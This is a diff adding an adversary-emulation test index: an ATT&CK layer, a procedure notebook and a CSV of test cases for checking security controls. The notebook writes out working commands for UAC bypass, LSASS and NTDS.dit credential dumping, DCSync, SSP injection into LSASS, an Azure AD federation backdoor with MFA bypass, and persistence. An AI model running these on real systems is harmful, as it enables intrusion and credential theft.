+ }, + { + "enabled": false, + "techniqueID": "T1578.001" + }, + { + "enabled": false, + "techniqueID": "T1578.002" + }, + { + "enabled": false, + "techniqueID": "T1578.003" + }, + { + "enabled": false, + "techniqueID": "T1578.004" + }, + { + "enabled": false, + "techniqueID": "T1578.005" + }, + { + "enabled": false, + "techniqueID": "T1580" + }, + { + "enabled": false, + "techniqueID": "T1583" + }, + { + "enabled": false, + "techniqueID": "T1583.001" + }, + { + "enabled": false, + "techniqueID": "T1583.002" + }, + { + "enabled": false, + "techniqueID": "T1583.003" + }, + { + "enabled": false, + "techniqueID": "T1583.004" + }, + { + "enabled": false, + "techniqueID": "T1583.005" + }, + { + "enabled": false, + "techniqueID": "T1583.006" + }, + { + "enabled": false, + "techniqueID": "T1583.007" + }, + { + "enabled": false, + "techniqueID": "T1583.008" + }, + { + "enabled": false, + "techniqueID": "T1584" + }, + { + "enabled": false, + "techniqueID": "T1584.001" + }, + { + "enabled": false, + "techniqueID": "T1584.002" + }, + { + "enabled": false, + "techniqueID": "T1584.003" + }, + { + "enabled": false, + "techniqueID": "T1584.004" + }, + { + "enabled": false, + "techniqueID": "T1584.005" + }, + { + "enabled": false, + "techniqueID": "T1584.006" + }, + { + "enabled": false, + "techniqueID": "T1584.007" + }, + { + "enabled": false, + "techniqueID": "T1585" + }, + { + "enabled": false, + "techniqueID": "T1585.001" + }, + { + "enabled": false, + "techniqueID": "T1585.002" + }, + { + "enabled": false, + "techniqueID": "T1585.003" + }, + { + "enabled": false, + "techniqueID": "T1586" + }, + { + "enabled": false, + "techniqueID": "T1586.001" + }, + { + "enabled": false, + "techniqueID": "T1586.002" + }, + { + "enabled": false, + "techniqueID": "T1586.003" + }, + { + "enabled": false, + "techniqueID": "T1587" + }, + { + "enabled": false, + "techniqueID": "T1587.001" + }, + { + "enabled": false, + "techniqueID": "T1587.002" + }, + { + "enabled": false, + "techniqueID": 
"T1587.003" + }, + { + "enabled": false, + "techniqueID": "T1587.004" + }, + { + "enabled": false, + "techniqueID": "T1588" + }, + { + "enabled": false, + "techniqueID": "T1588.001" + }, + { + "enabled": false, + "techniqueID": "T1588.002" + }, + { + "enabled": false, + "techniqueID": "T1588.003" + }, + { + "enabled": false, + "techniqueID": "T1588.004" + }, + { + "enabled": false, + "techniqueID": "T1588.005" + }, + { + "enabled": false, + "techniqueID": "T1588.006" + }, + { + "enabled": false, + "techniqueID": "T1589" + }, + { + "enabled": false, + "techniqueID": "T1589.001" + }, + { + "enabled": false, + "techniqueID": "T1589.002" + }, + { + "enabled": false, + "techniqueID": "T1589.003" + }, + { + "enabled": false, + "techniqueID": "T1590" + }, + { + "enabled": false, + "techniqueID": "T1590.001" + }, + { + "enabled": false, + "techniqueID": "T1590.002" + }, + { + "enabled": false, + "techniqueID": "T1590.003" + }, + { + "enabled": false, + "techniqueID": "T1590.004" + }, + { + "enabled": false, + "techniqueID": "T1590.005" + }, + { + "enabled": false, + "techniqueID": "T1590.006" + }, + { + "enabled": false, + "techniqueID": "T1591" + }, + { + "enabled": false, + "techniqueID": "T1591.001" + }, + { + "enabled": false, + "techniqueID": "T1591.002" + }, + { + "enabled": false, + "techniqueID": "T1591.003" + }, + { + "enabled": false, + "techniqueID": "T1591.004" + }, + { + "enabled": false, + "techniqueID": "T1592" + }, + { + "enabled": false, + "techniqueID": "T1592.001" + }, + { + "enabled": false, + "techniqueID": "T1592.002" + }, + { + "enabled": false, + "techniqueID": "T1592.003" + }, + { + "enabled": false, + "techniqueID": "T1592.004" + }, + { + "enabled": false, + "techniqueID": "T1593" + }, + { + "enabled": false, + "techniqueID": "T1593.001" + }, + { + "enabled": false, + "techniqueID": "T1593.002" + }, + { + "enabled": false, + "techniqueID": "T1593.003" + }, + { + "enabled": false, + "techniqueID": "T1594" + }, + { + "enabled": false, + 
"techniqueID": "T1595" + }, + { + "enabled": false, + "techniqueID": "T1595.001" + }, + { + "enabled": false, + "techniqueID": "T1595.002" + }, + { + "enabled": false, + "techniqueID": "T1595.003" + }, + { + "enabled": false, + "techniqueID": "T1596" + }, + { + "enabled": false, + "techniqueID": "T1596.001" + }, + { + "enabled": false, + "techniqueID": "T1596.002" + }, + { + "enabled": false, + "techniqueID": "T1596.003" + }, + { + "enabled": false, + "techniqueID": "T1596.004" + }, + { + "enabled": false, + "techniqueID": "T1596.005" + }, + { + "enabled": false, + "techniqueID": "T1597" + }, + { + "enabled": false, + "techniqueID": "T1597.001" + }, + { + "enabled": false, + "techniqueID": "T1597.002" + }, + { + "enabled": false, + "techniqueID": "T1598" + }, + { + "enabled": false, + "techniqueID": "T1598.001" + }, + { + "enabled": false, + "techniqueID": "T1598.002" + }, + { + "enabled": false, + "techniqueID": "T1598.003" + }, + { + "enabled": false, + "techniqueID": "T1598.004" + }, + { + "enabled": false, + "techniqueID": "T1599" + }, + { + "enabled": false, + "techniqueID": "T1599.001" + }, + { + "enabled": false, + "techniqueID": "T1600" + }, + { + "enabled": false, + "techniqueID": "T1600.001" + }, + { + "enabled": false, + "techniqueID": "T1600.002" + }, + { + "enabled": false, + "techniqueID": "T1601" + }, + { + "enabled": false, + "techniqueID": "T1601.001" + }, + { + "enabled": false, + "techniqueID": "T1601.002" + }, + { + "enabled": false, + "techniqueID": "T1602" + }, + { + "enabled": false, + "techniqueID": "T1602.001" + }, + { + "enabled": false, + "techniqueID": "T1602.002" + }, + { + "enabled": false, + "techniqueID": "T1606" + }, + { + "enabled": false, + "techniqueID": "T1606.001" + }, + { + "enabled": false, + "techniqueID": "T1606.002" + }, + { + "enabled": false, + "techniqueID": "T1608" + }, + { + "enabled": false, + "techniqueID": "T1608.001" + }, + { + "enabled": false, + "techniqueID": "T1608.002" + }, + { + "enabled": false, + 
"techniqueID": "T1608.003" + }, + { + "enabled": false, + "techniqueID": "T1608.004" + }, + { + "enabled": false, + "techniqueID": "T1608.005" + }, + { + "enabled": false, + "techniqueID": "T1608.006" + }, + { + "enabled": false, + "techniqueID": "T1609" + }, + { + "enabled": false, + "techniqueID": "T1610" + }, + { + "enabled": false, + "techniqueID": "T1611" + }, + { + "enabled": false, + "techniqueID": "T1612" + }, + { + "enabled": false, + "techniqueID": "T1613" + }, + { + "enabled": false, + "techniqueID": "T1614" + }, + { + "enabled": false, + "techniqueID": "T1614.001" + }, + { + "enabled": false, + "techniqueID": "T1615" + }, + { + "enabled": false, + "techniqueID": "T1619" + }, + { + "enabled": false, + "techniqueID": "T1620" + }, + { + "color": "#7a34eb", + "techniqueID": "T1621" + }, + { + "enabled": false, + "techniqueID": "T1622" + }, + { + "enabled": false, + "techniqueID": "T1647" + }, + { + "enabled": false, + "techniqueID": "T1648" + }, + { + "enabled": false, + "techniqueID": "T1649" + }, + { + "enabled": false, + "techniqueID": "T1650" + }, + { + "enabled": false, + "techniqueID": "T1651" + }, + { + "enabled": false, + "techniqueID": "T1652" + }, + { + "enabled": false, + "techniqueID": "T1653" + }, + { + "enabled": false, + "techniqueID": "T1654" + }, + { + "enabled": false, + "techniqueID": "T1656" + }, + { + "enabled": false, + "techniqueID": "T1657" + }, + { + "enabled": false, + "techniqueID": "T1659" + } + ] +} \ No newline at end of file diff --git a/ot-index-2024/ot-index-2024-v1.0-notebook.md b/ot-index-2024/ot-index-2024-v1.0-notebook.md new file mode 100644 index 0000000..f03ce83 --- /dev/null +++ b/ot-index-2024/ot-index-2024-v1.0-notebook.md 
@@ -0,0 +1,534 @@
+# General
+
+# OT
+
+# Initial Access
+
+## MFA Push Spam - General guidance
+
+Push-based MFA systems are susceptible to abuse by attackers because they allow an attacker to send a large volume of MFA requests to a user in order to induce that user to accept the prompt in the hopes it ends the requests.
+
+Spam a target user with MFA approval prompts. Unlike a real-world scenario, this is not meant to test the human response to being inundated with MFA requests but rather the technical security controls for such a situation.
+
+### Guidance
+
+Send at least 10 MFA requests to the target user
+
+### Notes
+
+- If MFA is in place, but it does not use some form of zero-knowledge approval (e.g. push notification accept, SMS accept, etc), then it should be considered a block. For example, if the MFA systems requires entering a one-time code, then it would not be susceptible to this attack and therefore be blocked. If no MFA is enforced, it should be considered not blocked.
+
+## Malicious ISOs - Generic ISO-wrapped payload
+
+ISO archives can be used to deliver malicious payloads while bypassing mark-of-the-web restrictions
+
+Use an ISO to deliver a malicious executable payload
+
+### Prerequisites
+
+1. Payload
+1. ISO containing the payload
+ 1. You can use `mkisofs` to create an ISO:
+ ```
+ bash> mkisofs -J -o {{ iso }} {{ payload }}
+ ```
+
+## Cloud storage sharing - General guidance
+
+### Prerequisites
+
+- Have an account on a cloud storage service that allows sharing files via email
+
+### Guidance
+
+Upload then share a file with a target email address via the service. For example, in Google Drive, right click -> share -> share -> enter email -> enter message -> send.
+
+### Notes
+
+Some cloud storage services perform file scanning of uploaded files for malicious content. Consider uploading the file immediately before sharing to limit the impact on testing.
+
+# Execution
+
+# Defense Evasion
+
+## Malicious kernel driver use - load known-abusable driver
+
+Kernel drivers can be used by attackers for a number of malicious activities, including hiding artifacts and tampering with endpoint security tools.
+
+This bypasses the need for attackers to retrieve legitimate code-signing certificates for a driver they wrote.
+
+### Prerequisites
+
+- Local admin
+- A known-abusable driver. Examples:
+ - **DBUtil_2_3 (SHA256 - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5)**
+ - RTCore64 (SHA256 - 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)
+ - IQVM64 (SHA256 - 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b)
+
+### Guidance
+
+Example loading using sc.exe
+
+```
+cmd> sc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\windows\System32\Drivers\{{ sys_file }} displayname= {{ name }}
+```
+
+### Cleanup
+
+- Is using sc.exe, stop and delete the service then restart the machine
+
+### Notes
+
+Drivers can be found in multiple places, including:
+
+- Directly from vendor sites
+- VirusTotal
+- Aggregators like LOLDrivers and KDU
+ - LOLDrivers: https://github.com/magicsword-io/LOLDrivers/tree/main/drivers
+ - KDU: https://github.com/hfiref0x/KDU/
+
+## UAC Bypass - via fodhelper.exe
+
+User Account Control is not a security control but can cause issues with execution when attempting privileged operations
+
+Move to a high-integrity execution context via fodhelper.exe and a Registry modification. Fodhelper.exe is one of many unpatched methods for bypassing UAC.
+
+### Prerequisites
+
+- Split-token admin account
+
+### Guidance
+
+Check for the existence of the target registry key. If it exists, note the value so that it can be restored after execution.
+
+```
+cmd> reg query HKCU\Software\Classes\ms-settings\Shell\Open\command
+```
+
+Modify the registry key and execute fodhelper.exe to obtain an elevated command prompt:
+
+```
+cmd>
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+c:\windows\system32\fodhelper.exe
+```
+
+### Cleanup
+
+If the registry existed prior to execution, restore its value:
+
+```
+cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v {{ initial_command }} /f
+```
+
+Otherwise, delete the key:
+
+```
+cmd> reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+```
+
+### References
+
+- https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+- https://4pfsec.com/offensive-windows-fodhelper-exe/
+
+## DLL Side Loading - General guidance
+
+### Notes
+
+- For an up-to-date list of side-loadable DLLs, refer to https://hijacklibs.net/
+
+## DLL Search Order Hijacking - MpCmdRun.exe sideloading
+
+MpCmdRun.exe is susceptible to a DLL sideloading hijack via its dependency on MpClient.dll
+
+### Prerequisites
+
+- A DLL with the appropriate exports called `mpclient.dll`
+ - Use: https://github.com/2XXE-SRA/payload_resources/tree/master/dllsideload/mpclient
+
+### Guidance
+
+Copy `c:\program files\windows defender\mpcmdrun.exe` to the same directory as the `mpclient.dll` payload then run `mpcmdrun.exe`
+
+## Conditional Access Policy Modifications - General guidance
+
+### Notes
+
+- Create a new conditional access policy to avoid modifying production policies. Additionally, consider disabling the policy or setting it to report-only before modifying it.
+
+# Discovery
+
+# Command and Control
+
+## Remote Assistance Software - General guidance
+
+Access via remote assistance software
+
+Select and use a well-known remote assistance software
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+ 1. TeamViewer: https://www.teamviewer.com/
+ 2. GoTo Resolve: https://www.goto.com/it-management/resolve
+ 3. ConnectWise Control: https://control.connectwise.com/
+
+### Notes
+
+- Where possible, use remote assistance software already in use in the environment
+
+## Remote tool download - General guidance
+
+Transfer tool into environment by downloading from the Internet
+
+### Notes
+
+- The maliciousness level of the binary should align with the intent of the test. For testing signature-based checks, use a known malicious tool, such as Mimikatz. For testing sandboxing or similar network security technologies, use an unknown yet still overtly malicious tool, such as one built around the current attack infrastructure. By default, start with the most malicious choice.
+
+# Lateral Movement
+
+# Persistence
+
+## Scheduled Task Persistence - via schtasks.exe
+
+Use built-in schtasks.exe to persist by creating a scheduled task
+
+### Guidance
+
+```
+CMD> schtasks /Create /SC DAILY /TN "{{ taskname }}" /TR "{{ command }}" /ST 09:00
+```
+
+### Cleanup
+
+```
+CMD> schtasks /delete /tn "{{ taskname }}" /f
+```
+
+## Windows Service Persistence - via sc.exe
+
+Use built-in sc.exe to persist
+
+### Guidance
+
+```
+CMD> sc create {{ service_name }} binPath= "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> sc delete {{ service_name }}
+```
+
+## Registry Run Key Persistence - via reg.exe
+
+Use built-in reg.exe to persist via the Registry by setting a command to be run on user login
+
+### Guidance
+
+```
+CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /F /V "{{ key_name }}"
+```
+
+## Persistence in Azure AD - Register a New Device
+
+Register a new device in Azure AD
+
+### Prerequisites
+
+- Azure AD credentials
+- AAD Internals PowerShell module (https://aadinternals.com/aadinternals/#installation)
+ - Install: `PS> install-module aadinternals -scope currentuser`
+ - Import: `PS> import-module aadinternals`
+
+### Guidance
+
+Authenticate to Azure AD and save the token
+
+```
+PS> Get-AADIntAccessTokenForAADJoin -SaveToCache
+```
+
+Register a device:
+
+```
+PS> Join-AADIntDeviceToAzureAD -DeviceName "{{ device_name }}" -DeviceType "{{ device_type }}" -OSVersion "{{ os_version }}" -JoinType Register
+```
+
+ - This will save a `.pfx` certificate to the current working directory, which is needed for cleanup
+ - Note: The provided values do not need to refer to real characteristics
+
+### Cleanup
+
+Remove the device from Azure AD
+
+```
+PS> Remove-AADIntDeviceFromAzureAD -PfxFileName {{ pfx_certificate_file }}
+```
+
+## Azure AD Domain Federation - Backdoor via AADInternals
+
+Use AADInternals to create a backdoor federation domain for persisting access to an environment.
+
+### Prerequisites
+
+- Permissions to modify domain authentication settings
+ - and an access token for the user with these permissions, referred to as `$at` in example commands. To retrieve a token, use `$at=Get-AADIntAccessTokenForAADGraph -Credentials (get-credential)` and proceed through the prompts
+- AADInternals installed
+ - `Install-Module AADInternals`
+- A target verified domain in Azure AD
+ - To add a domain, Go to Azure AD -> custom domain names -> add -> set the provided DNS records for your domain -> wait for the verification to compelete
+- A user with an immutable ID set
+ - To set an immutable ID for a user: `Set-AADIntUser -UserPrincipalName {{ upn_or_email }} -ImmutableId "{{ id }}" -AccessToken $at` where the `id` is an arbitrary unnique value
+
+### Guidance
+
+To set the backdoor
+
+```
+PS> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "{{ domain }}"
+```
+
+To use the backdoor. This works for any user in the tenant, regardless of their domain.
+
+```
+Open-AADIntOffice365Portal -ImmutableID {{ id }} -UseBuiltInCertificate -ByPassMFA $true -Issuer {{ issuer }}
+```
+
+- `id` is the immutable ID of the target user
+- `issuer` is the IssuerUri provided in the output of the previous command
+
+### Cleanup
+
+- Delete the domain
+
+### Notes
+
+- The domain must be verified for the backdoor to work
+
+### References
+
+- https://o365blog.com/post/aadbackdoor/
+- https://www.mandiant.com/resources/blog/detecting-microsoft-365-azure-active-directory-backdoors
+
+# Credential Access
+
+## DCSync - via Mimikatz
+
+The DCSync attack mimics normal replication behavior between DCs, allowing for remote extraction of credentials
+
+Uses Mimikatz's lsadump::dcsync command
+
+### Prerequisites
+
+- Command execution in the context of an account with Active Directory replication rights
+- User accounts to target
+- Mimikatz binary (https://github.com/gentilkiwi/mimikatz)
+
+### Guidance
+
+```
+mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ target_username }}
+```
+
+### Troubleshooting
+
+If Mimikatz is giving an error of `ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)`, try the following:
+
+```
+cmd> klist purge
+cmd> gpupdate /force
+```
+
+## LSASS dumping using comsvcs.dll - via rundll32.exe
+
+Use `rundll32.exe` to call the `MiniDump` export from `comsvcs.dll`
+
+### Prerequisites
+
+- Administrator rights
+- SeDebugPrivilege
+
+### Guidance
+
+```
+shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+```
+
+This command must be run from a shell process that has `SeDebugPrivilege` enabled.
+PowerShell should work to this end.
+
+You can acquire `SeDebugPrivilege` for `cmd.exe` by launching it as `SYSTEM` via Sysinternals' `PsExec` (`psexec -sid cmd`).
+Alternatively, you can use the VBScript file from `modexp`: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ (`cscript procdump.vbs lsass.exe`)
+
+### Cleanup
+
+- Delete the dump file
+
+## Extract NTDS.dit Credentials - via ntdsutil.exe
+
+Dump domain hashes for all domain users on the domain controller via ntdsutil.exe, which uses Volume Shadow Services (VSS)
+
+### Prerequisites
+
+- Elevated command execution on a DC
+- Sufficient free disk space on the DC (verify size of ntds.dit file against free disk space)
+
+### Guidance
+
+Note the existing snapshots before dumping NTDS.dit:
+
+```
+cmd> ntdsutil.exe snapshot "list all" quit quit
+```
+
+Dump NTDS.dit using one of the following methods, noting the snapshot number. The output path should be an empty directory:
+
+```
+cmd> ntdsutil “ac in ntds” “ifm” “cr fu {{ output_path }}” q q
+```
+
+### Notes
+
+In the case that ntdsutil is killed during execution (either manually or by an EDR product), the snapshots need to be cleaned up. You cannot do so using vssadmin because they are in use. Delete the snapshot with the following command, using the snapshot number from the dump command in the above guidance:
+
+```
+cmd> ntdsutil.exe snapshot "list all" "delete {{ snapshot_number }}" quit quit
+```
+
+If the command itself is blocked by a security tool, ntdsutil.exe's interactive mode can be used if executing interactively. The commands are the same but should be used one at a time:
+
+```
+cmd> ntdsutil.exe
+ntdsutil> ac in ntds
+ntdsutil> ifm
+ntdsutil> cr fu C:\path\to\ntds-dump
+ntdsutil> q q
+```
+
+### Cleanup
+
+1. Delete the snapshot if necessary (see "Notes" above)
+1. Remove the NTDS.dit copy at the path you specified during execution
+
+## LSASS Security Service Provider - Temporary SSP
+
+Register a Security Service Provider (SSP) for LSASS. This will trigger a DLL load of the SSP into LSASS.
+
+Register an SSP temporarily by calling the AddSecurityPackage() API.
+
+### Prerequisites
+
+- Local administrator
+- A compiled SSP DLL and a method of calling the AddSecurityPackage() API (e.g. custom exe payload)
+ - SSP source: https://github.com/2XXE-SRA/payload_resources/blob/master/c/lsa_ssp.c
+ - This can be compiled using MinGW via `x86_64-w64-mingw32-gcc -shared -municode -o ssp.dll lsa_ssp.c -lsecur32`
+ - SSP loader: https://github.com/2XXE-SRA/payload_resources/blob/master/powershell/ssp_loader.ps1
+
+### Guidance
+
+Open an administrative PowerShell terminal.
+
+If using the script linked above, run the following command
+
+```
+PS> .\ssp_loader.ps1 {{ ssp_dll_path }}
+```
+
+If loading manually, first set the path to the compiled SSP DLL into a variable
+
+```
+PS> $DllName = "{{ ssp_dll_path }}"
+```
+
+Then load the SSP into LSASS
+
+```
+PS>
+$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
+$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)
+
+$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',
+ 'secur32.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([String], [IntPtr]),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+$Secur32 = $TypeBuilder.CreateType()
+
+if ([IntPtr]::Size -eq 4) {
+ $StructSize = 20
+} else {
+ $StructSize = 24
+}
+
+$StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)
+[Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)
+
+$Secur32::AddSecurityPackage($DllName, $StructPtr)
+```
+
+### Cleanup
+
+- The SSP will be removed on system reboot or after manually calling DeleteSecurityPackage()
+
+### References
+
+- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+
+# Impact
+
+## GPO Modifications - General guidance
+
+### Notes
+
+- Create a new group policy object to avoid modifying production policies. Additionally, consider disabling the policy before modifying it.
+
+# Exfiltration
+
+## Exfiltration to cloud storage - General guidance
+
+Select and use a well-known cloud storage service
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+ 1. Generic: https://rclone.org/downloads/
+ 2. MEGA: https://mega.io/desktop
+ 3. Dropbox: https://www.dropbox.com/install
+
+### Notes
+
+- Where possible, use cloud storage service already in use in the environment
+
+## DLP Test - General use
+
+DLP Test (dlptest.com) is a web utility for testing if exfiltration of sensitive data is successful
+
+General usage notes for DLP Test
+
+### Notes
+
+- If sample sensitive data is needed, the site provides it in different types and formats
+- The site supports HTTP, HTTPS, and FTP
+- Do not upload actual sensitive data to the site
+
+# Collection
+
diff --git a/ot-index-2024/ot-index-2024-v1.0-summary.csv b/ot-index-2024/ot-index-2024-v1.0-summary.csv
new file mode 100644
index 0000000..2503706
--- /dev/null
+++ b/ot-index-2024/ot-index-2024-v1.0-summary.csv
@@ -0,0 +1,55 @@
+"Test Case","MITRE ID","Campaign","Description"
+"Replay PCAP for OT service command","T1021","OT","Replay a packet capture of a dangerous OT-specific service commands (e.g. S7 stop) to simulate the traffic for passive OT security controls"
+"Replay PCAP for Triton","T1021","OT","Replay a packet capture of a dangerous Triton malware to simulate the traffic for passive OT security controls"
+"Lateral movement via remote service","T1021","OT","Move laterally to another system using a remote service (e.g. SSH, RDP)"
+"Internal port scan against OT network","T1046","OT","Run internal port scan to probe for interesting OT-specific ports"
+"Network services scan against OT target","T1046","OT","Scan an OT system for OT-specific network services"
+"MQTT C2 over TCP/1883","T1071","OT","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over MQTT"
+"Transfer tool remotely to target","T1570","OT","Copy a payload to a remote target"
+"Remote service login brute force","T1110.001","OT","Attempt to login as a user via a remote service (e.g. SSH, Telnet) using multiple passwords"
+"Prompt a user with multiple MFA requests","T1621","Initial Access","Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt."
+"Attachment - Macro","T1566.001","Initial Access","Send a spearphishing attachment containing a malicious macro payload to a target inbox"
+"Attachment - ISO","T1566.001","Initial Access","Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions."
+"Link - Zipped DLL via sharing","T1566.002","Initial Access","Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service"
+"Macro - Remote Template","T1221","Execution","Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document"
+"Load known-abusable kernel driver","T1014","Defense Evasion","Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes."
+"DLL execution using Rundll32","T1218.011","Defense Evasion","Execute a malicious DLL's function directly using rundll32"
+"Bypass User Account Control (UAC) via fodhelper","T1548.002","Defense Evasion","Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification"
+"Clear Windows Event Log entries","T1070.001","Defense Evasion","Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs."
+"Sideload a DLL into a legitimate application","T1574.002","Defense Evasion","Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application."
+"Modify identity policy in IdP","T1484","Defense Evasion","Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement."
+"Disable Windows Defender via PowerShell","T1562.001","Defense Evasion","Use PowerShell's Set-MpPreference to disable Windows Defender"
+"Domain Controller discovery via nltest","T1018","Discovery","Use nltest.exe to identify domain controllers in the domain"
+"Enumerate domain groups and users using net","T1087.002","Discovery","Enumerate domain users and domain groups using the builtin net.exe"
+"BloodHound DC enumeration","T1087.002","Discovery","Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller"
+"HTTP C2 over tcp/80","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP"
+"HTTPS C2 over tcp/443","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS"
+"Access via remote assistance tool","T1219","Command and Control","Establish connection to system using a legitimate remote assistance application"
+"Remote tool download over HTTP","T1105","Command and Control","Download a tool from a public hosting location onto the victim system"
+"Lateral Movement via WMI","T1021.003","Lateral Movement","Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system"
+"Lateral Movement via PsExec","T1021.002","Lateral Movement","Move to another system by creating a service remotely via Sysinternals PsExec"
+"Lateral Movement via RDP","T1021.001","Lateral Movement","Perform an interactive logons to a Windows system via RDP"
+"Persist via new scheduled task","T1053.005","Persistence","Persist on a system by creating a new scheduled task"
+"Persist via new Windows service","T1543.003","Persistence","Persist on a system by creating a new service"
+"Persist via Registry Winlogon Shell","T1547.004","Persistence","Run a payload during user login by setting a Registry Winlogon key"
+"Persist via Registry ""Run"" key","T1547.001","Persistence","Run a payload during user login and startup by setting a registry run key"
+"Register a new device in Azure AD","T1098.005","Persistence","Register a new device in Azure AD"
+"Configure a custom federated domain","T1484.002","Persistence","Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant."
+"Extract domain user credentials via replication","T1003.006","Credential Access","Replicate a user's hash from a domain controller using replication APIs (DCSync)."
+"Extract Logonpasswords via Nanodump","T1003.001","Credential Access","Use nanodump to extract credentials from LSASS process memory"
+"Dump LSASS memory using builtin comsvcs.dll","T1003.001","Credential Access","Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk"
+"Dump LSASS memory using Sysinternals ProcDump","T1003.001","Credential Access","Use ProcDump from Sysinternals to dump LSASS process memory"
+"Extract browser cookies","T1555.003","Credential Access","Extract cookie information from the user's browser"
+"Volumetric Kerberoasting","T1558.003","Credential Access","Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set"
+"Extract NTDS credentials via ntdsutil.exe","T1003.003","Credential Access","Dump domain hashes for all domain users on the domain controller via ntdsutil.exe, which uses Volume Shadow Services (VSS)"
+"Enabled WDigest via Registry","T1112","Credential Access","Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory"
+"Register Security Service Provider (SSP) in LSASS","T1547.005","Credential Access","Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS."
+"Encrypt a large amount of files","T1486","Impact","Encrypt a large amount of files on the endpoint to simulate ransomware"
+"Delete backup catalogs with wbadmin.exe","T1490","Impact","Delete native Windows backups"
+"Delete shadows with vssadmin.exe","T1490","Impact","Delete volume shadow copies on the host to inhibit file system recovery"
+"Modify group policy object","T1484.001","Impact","Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems."
+"Extract data to cloud storage service","T1567.002","Exfiltration","Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box"
+"Extract sensitive data over HTTP","T1048.003","Exfiltration","Extract data from the network over HTTP tcp/80 to an external host or IP."
+"Extract sensitive data over HTTP C2","T1041","Exfiltration","Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP"
+"Screen Capture","T1113","Collection","Capture an image of the user's screen"
+"Keylogger","T1056.001","Collection","Log user keystrokes"
diff --git a/ot-index-2024/ot-index-2024-v1.0.yml b/ot-index-2024/ot-index-2024-v1.0.yml
new file mode 100644
index 0000000..5a98534
--- /dev/null
+++ b/ot-index-2024/ot-index-2024-v1.0.yml
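Review bot: Several Description cells carry grammar slips that will surface verbatim in any report built from this summary, and at least the first also appears in the yml index below, so they should be corrected at the source if the CSV is generated from it: `"Replay a packet capture of a dangerous Triton malware"` (the "a" before "dangerous" does not fit), `"Perform an interactive logons"` → `"Perform an interactive logon"`, `"Enabled WDigest via Registry"` → `"Enable WDigest via Registry"`, and `"Register an SSP DLL that into LSASS"` → `"Register an SSP DLL into LSASS"`. The Campaign column also does not consistently match the tactic recorded for the same test case in the yml hunk that follows: "Macro - Remote Template" is filed under Execution here but carries `tactic: TA0005` there, and "Prompt a user with multiple MFA requests" is under Initial Access here with `tactic: TA0006` there. If Campaign is intended to mirror the ATT&CK tactic, one side should be corrected; if it is the index's own grouping, a short statement of that in the file's documentation would stop readers from reading the two as the same field.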
